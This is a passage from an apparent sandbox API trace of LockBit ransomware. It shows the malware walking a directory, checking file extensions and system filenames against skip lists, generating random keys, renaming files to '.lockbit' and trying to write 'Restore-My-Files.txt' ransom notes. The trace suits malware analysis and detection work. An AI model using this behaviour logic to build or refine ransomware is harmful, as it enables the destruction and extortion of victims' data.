lpString2=".MID") returned -1 [0117.048] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0117.048] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0117.048] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0117.048] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0117.048] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0117.048] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0117.048] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0117.048] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0117.048] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0117.048] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0117.048] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0117.048] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0117.048] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0117.048] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0117.048] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0117.048] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0117.048] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0117.048] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0117.048] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0117.049] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0117.049] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0117.049] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0117.049] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0117.049] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0117.049] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0117.049] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0117.049] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0117.049] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0117.049] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0117.049] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0117.049] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0117.049] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0117.049] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0117.049] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0117.049] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0117.049] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0117.049] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0117.049] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0117.050] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0117.050] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0117.050] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0117.050] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0117.050] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0117.050] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0117.050] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FINCL_01.MID") returned 1 [0117.050] lstrcmpiW (lpString1="ntldr", lpString2="FINCL_01.MID") returned 1 [0117.050] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FINCL_01.MID") returned 1 [0117.050] lstrcmpiW (lpString1="bootsect.bak", lpString2="FINCL_01.MID") returned -1 [0117.050] lstrcmpiW (lpString1="autorun.inf", lpString2="FINCL_01.MID") returned -1 [0117.050] lstrcmpiW (lpString1="thumbs.db", lpString2="FINCL_01.MID") returned 1 [0117.050] lstrcmpiW (lpString1="iconcache.db", lpString2="FINCL_01.MID") returned 1 [0117.050] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.050] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned=".MID" [0117.050] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0117.050] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0117.050] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0117.050] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0117.050] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0117.050] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0117.050] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0117.050] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0117.050] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0117.051] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0117.051] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0117.051] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0117.051] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0117.051] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0117.051] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0117.051] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0117.051] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0117.051] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0117.051] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0117.051] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0117.051] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0117.051] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0117.051] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0117.051] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0117.051] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0117.051] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0117.051] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0117.051] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0117.051] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID.lockbit") returned 72 [0117.051] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0117.055] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.056] malloc (_Size=0x40068) returned 0x1ff1e60 [0117.056] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=12981) returned 1 [0117.056] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.056] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0117.056] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.057] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0117.057] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0117.064] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.064] malloc (_Size=0xa6) returned 0x77d7a8 [0117.064] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.065] free (_Block=0x77d7a8) [0117.065] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.065] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.065] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.065] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x2466, dwReserved0=0x0, dwReserved1=0x0, cFileName="FINCL_02.MID", cAlternateFileName="")) returned 1 [0117.065] lstrcmpiW (lpString1=".", lpString2="FINCL_02.MID") returned -1 [0117.065] lstrcmpiW (lpString1="..", lpString2="FINCL_02.MID") returned -1 [0117.065] PathFindExtensionW (pszPath="FINCL_02.MID") returned=".MID" [0117.065] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0117.065] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0117.065] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0117.065] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0117.066] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0117.066] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0117.066] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0117.066] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0117.066] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0117.066] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0117.066] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0117.066] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0117.066] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0117.066] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0117.066] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0117.066] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0117.066] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0117.066] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0117.066] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0117.066] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0117.066] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0117.066] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0117.066] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0117.066] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0117.066] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0117.066] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0117.066] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0117.066] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0117.066] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0117.066] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0117.066] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0117.066] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0117.066] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0117.066] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0117.066] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0117.067] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0117.067] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0117.067] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0117.067] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0117.067] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0117.067] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0117.067] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0117.067] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0117.067] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0117.067] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0117.067] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0117.067] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0117.067] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FINCL_02.MID") returned 1 [0117.067] lstrcmpiW (lpString1="ntldr", lpString2="FINCL_02.MID") returned 1 [0117.067] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FINCL_02.MID") returned 1 [0117.067] lstrcmpiW (lpString1="bootsect.bak", lpString2="FINCL_02.MID") returned -1 [0117.067] lstrcmpiW (lpString1="autorun.inf", lpString2="FINCL_02.MID") returned -1 [0117.067] lstrcmpiW (lpString1="thumbs.db", lpString2="FINCL_02.MID") returned 1 [0117.067] lstrcmpiW (lpString1="iconcache.db", lpString2="FINCL_02.MID") returned 1 [0117.067] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.067] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned=".MID" [0117.067] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0117.067] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0117.067] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0117.067] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0117.067] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0117.067] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0117.067] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0117.068] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0117.068] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0117.068] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0117.068] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0117.068] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0117.068] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0117.068] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0117.068] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0117.068] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0117.068] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0117.068] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0117.068] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0117.068] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0117.068] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0117.068] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0117.068] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0117.068] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0117.068] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0117.068] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0117.068] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0117.068] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0117.068] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID.lockbit") returned 72 [0117.068] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0117.070] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.070] malloc (_Size=0x40068) returned 0x3d70450 [0117.070] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=9318) returned 1 [0117.070] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.070] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0117.070] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.071] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0117.071] ReadFile (in: hFile=0x81c, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0117.073] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.073] malloc (_Size=0xa6) returned 0x77d7a8 [0117.073] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.074] free (_Block=0x77d7a8) [0117.074] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.074] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.074] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.074] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x617e41d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x816, dwReserved0=0x0, dwReserved1=0x0, cFileName="FLAP.WMF", cAlternateFileName="")) returned 1 [0117.074] lstrcmpiW (lpString1=".", lpString2="FLAP.WMF") returned -1 [0117.075] lstrcmpiW (lpString1="..", lpString2="FLAP.WMF") returned -1 [0117.075] PathFindExtensionW (pszPath="FLAP.WMF") returned=".WMF" [0117.075] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.075] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.076] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.076] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FLAP.WMF") returned 1 [0117.076] lstrcmpiW (lpString1="ntldr", lpString2="FLAP.WMF") returned 1 [0117.076] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FLAP.WMF") returned 1 [0117.076] lstrcmpiW (lpString1="bootsect.bak", lpString2="FLAP.WMF") returned -1 [0117.076] lstrcmpiW (lpString1="autorun.inf", lpString2="FLAP.WMF") returned -1 [0117.076] lstrcmpiW (lpString1="thumbs.db", lpString2="FLAP.WMF") returned 1 [0117.077] lstrcmpiW (lpString1="iconcache.db", lpString2="FLAP.WMF") returned 1 [0117.077] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.077] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned=".WMF" [0117.077] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.077] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.077] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.078] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.078] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.078] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.078] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.078] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF.lockbit") returned 68 [0117.078] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\flap.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0117.081] CreateIoCompletionPort 